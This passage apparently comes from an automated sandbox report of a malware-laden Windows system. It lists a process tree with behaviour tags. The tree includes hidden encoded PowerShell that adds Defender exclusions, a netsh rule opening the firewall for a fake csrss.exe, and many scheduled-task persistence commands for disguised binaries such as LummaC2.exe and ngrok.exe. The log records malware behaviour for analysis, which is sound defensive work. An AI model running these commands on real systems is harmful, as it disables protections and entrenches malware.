        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 420
        5⤵
        Program crash
        
        PID:5724
  - - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
      "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
      4⤵
      PID:4804
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6960
    - - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
        
        "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
        5⤵
        
        PID:8808
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9172
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:9092
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:2128
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2124
- - C:\Users\Admin\Desktop\Files\Tinder%20Bot.exe
    "C:\Users\Admin\Desktop\Files\Tinder%20Bot.exe"
    3⤵
    PID:7984
- - C:\Users\Admin\Desktop\Files\PrintSpoofer.exe
    "C:\Users\Admin\Desktop\Files\PrintSpoofer.exe"
    3⤵
    PID:4524
- - C:\Users\Admin\Desktop\Files\VmManagedSetup.exe
    "C:\Users\Admin\Desktop\Files\VmManagedSetup.exe"
    3⤵
    PID:8104
- - C:\Users\Admin\Desktop\Files\hjv.exe
    "C:\Users\Admin\Desktop\Files\hjv.exe"
    3⤵
    PID:7152
  - - C:\Users\Admin\Desktop\Files\hjv.exe
      "C:\Users\Admin\Desktop\Files\hjv.exe"
      4⤵
      PID:3672
- - C:\Users\Admin\Desktop\Files\artifact.exe
    "C:\Users\Admin\Desktop\Files\artifact.exe"
    3⤵
    PID:8072
- - C:\Users\Admin\Desktop\Files\update.exe
    "C:\Users\Admin\Desktop\Files\update.exe"
    3⤵
    PID:8796
- - C:\Users\Admin\Desktop\Files\HJCL.exe
    "C:\Users\Admin\Desktop\Files\HJCL.exe"
    3⤵
    PID:5416
- - C:\Users\Admin\Desktop\Files\BroomSetup.exe
    "C:\Users\Admin\Desktop\Files\BroomSetup.exe"
    3⤵
    PID:8312
- - C:\Users\Admin\Desktop\Files\lomik.exe
    "C:\Users\Admin\Desktop\Files\lomik.exe"
    3⤵
    PID:992
- - C:\Users\Admin\Desktop\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
    "C:\Users\Admin\Desktop\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
    3⤵
    PID:2024
- C:\Users\Admin\Desktop\Files\cp.exe
  "C:\Users\Admin\Desktop\Files\cp.exe"
  2⤵
  - Executes dropped EXE
  PID:5972
- C:\Users\Admin\Desktop\Files\140.exe
  "C:\Users\Admin\Desktop\Files\140.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3792
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2300
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  PID:3664
- - C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /1
    3⤵
    PID:6668
- C:\Windows\SysWOW64\colorcpl.exe
  "C:\Windows\SysWOW64\colorcpl.exe"
  2⤵
  PID:1028
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  PID:7644

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3200

C:\Windows\lqrjma.exe
C:\Windows\lqrjma.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1884

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 408 -ip 408
1⤵
PID:2396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2268 -ip 2268
1⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:388

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
- Executes dropped EXE
PID:1392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2268 -ip 2268
1⤵
PID:3264

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
1⤵
PID:6420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6400 -ip 6400
1⤵
PID:2640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6400 -ip 6400
1⤵
PID:2020

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:3320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 8476 -ip 8476
1⤵
PID:8244

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:9208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7680 -ip 7680
1⤵
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5484 -ip 5484
1⤵
PID:6228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2268 -ip 2268
1⤵
PID:8852

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
1⤵
PID:7604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7000 -ip 7000
1⤵
PID:9044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
1⤵
- Command and Scripting Interpreter: PowerShell
PID:7516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7000 -ip 7000
1⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5484 -ip 5484
1⤵
PID:8508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5484 -ip 5484
1⤵
PID:7872

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:6360

C:\ProgramData\Chrome\CNSWA.exe
C:\ProgramData\Chrome\CNSWA.exe
1⤵
PID:8940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
  2⤵
  PID:7416
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
    3⤵
    - Creates scheduled task(s)
    PID:8016

C:\Users\Admin\AppData\Local\Remaining\sifikpug\Tags.exe
C:\Users\Admin\AppData\Local\Remaining\sifikpug\Tags.exe
1⤵
PID:6412
- C:\Users\Admin\AppData\Local\Remaining\sifikpug\Tags.exe
  "C:\Users\Admin\AppData\Local\Remaining\sifikpug\Tags.exe"
  2⤵
  PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2288 -ip 2288
1⤵
PID:3244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6216 -ip 6216
1⤵
PID:7988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6216 -ip 6216
1⤵
PID:9076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6216 -ip 6216
1⤵
PID:8696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6216 -ip 6216
1⤵
PID:8480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6216 -ip 6216
1⤵
PID:5524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6216 -ip 6216
1⤵
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6216 -ip 6216
1⤵
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6216 -ip 6216
1⤵
PID:8604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6216 -ip 6216
1⤵
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6216 -ip 6216
1⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2676 -ip 2676
1⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2676 -ip 2676
1⤵
PID:6748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2676 -ip 2676
1⤵
PID:7740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2676 -ip 2676
1⤵
PID:6740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2676 -ip 2676
1⤵
PID:8796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2676 -ip 2676
1⤵
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2676 -ip 2676
1⤵
PID:7784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABpAG4AZABlAHgALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFQAeQBwAGUASQBkAFwAaQBuAGQAZQB4AC4AZQB4AGUA
1⤵
- Command and Scripting Interpreter: PowerShell
PID:9032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2676 -ip 2676
1⤵
PID:6156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2676 -ip 2676
1⤵
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2676 -ip 2676
1⤵
PID:5964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2676 -ip 2676
1⤵
PID:9028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2676 -ip 2676
1⤵
PID:6252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2676 -ip 2676
1⤵
PID:3900

C:\Users\Admin\AppData\Roaming\TypeId\index.exe
C:\Users\Admin\AppData\Roaming\TypeId\index.exe
1⤵
PID:8628

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
1⤵
PID:6120

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:7684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6120 -ip 6120
1⤵
PID:6188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2268 -ip 2268
1⤵
PID:7992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2676 -ip 2676
1⤵
PID:8864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2268 -ip 2268
1⤵
PID:8968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2676 -ip 2676
1⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:7060

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
1⤵
PID:5784
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 396
  2⤵
  - Program crash
  PID:8428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226h" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Downloads\hack1226.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226" /sc ONLOGON /tr "'C:\Users\Public\Downloads\hack1226.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226h" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Downloads\hack1226.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "openfileso" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\openfiles.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5784 -ip 5784
1⤵
PID:7180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "openfiles" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\openfiles.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "openfileso" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\openfiles.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Windows\Vss\Writers\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Windows\Vss\Writers\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\Default\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\PortproviderwinMonitorSvc\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\PortproviderwinMonitorSvc\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\PortproviderwinMonitorSvc\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender\fr-FR\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Defender\fr-FR\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DctoouxD" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\Dctooux.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Dctooux" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Dctooux.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:64

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DctoouxD" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Dctooux.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msdtcm" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\msdtc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msdtc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msdtc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msdtcm" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\msdtc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "LummaC2L" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\LummaC2.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "LummaC2" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\LummaC2.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "LummaC2L" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\LummaC2.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ngrokn" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\ngrok.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ngrok" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\ngrok.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ngrokn" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Mail\ngrok.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]%" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Links\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]" /sc ONLOGON /tr "'C:\Users\Admin\Links\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]%" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Links\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Mail\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
PID:9124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:9208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\PortproviderwinMonitorSvc\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PortproviderwinMonitorSvc\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\PortproviderwinMonitorSvc\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]%" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]" /sc ONLOGON /tr "'C:\Users\Default User\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]%" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSI.CentralServerM" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\MSI.CentralServer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSI.CentralServer" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\MSI.CentralServer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSI.CentralServerM" /sc MINUTE /mo 5 /tr "'C:\Windows\Downloaded Program Files\MSI.CentralServer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 12 /tr "'C:\PortproviderwinMonitorSvc\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
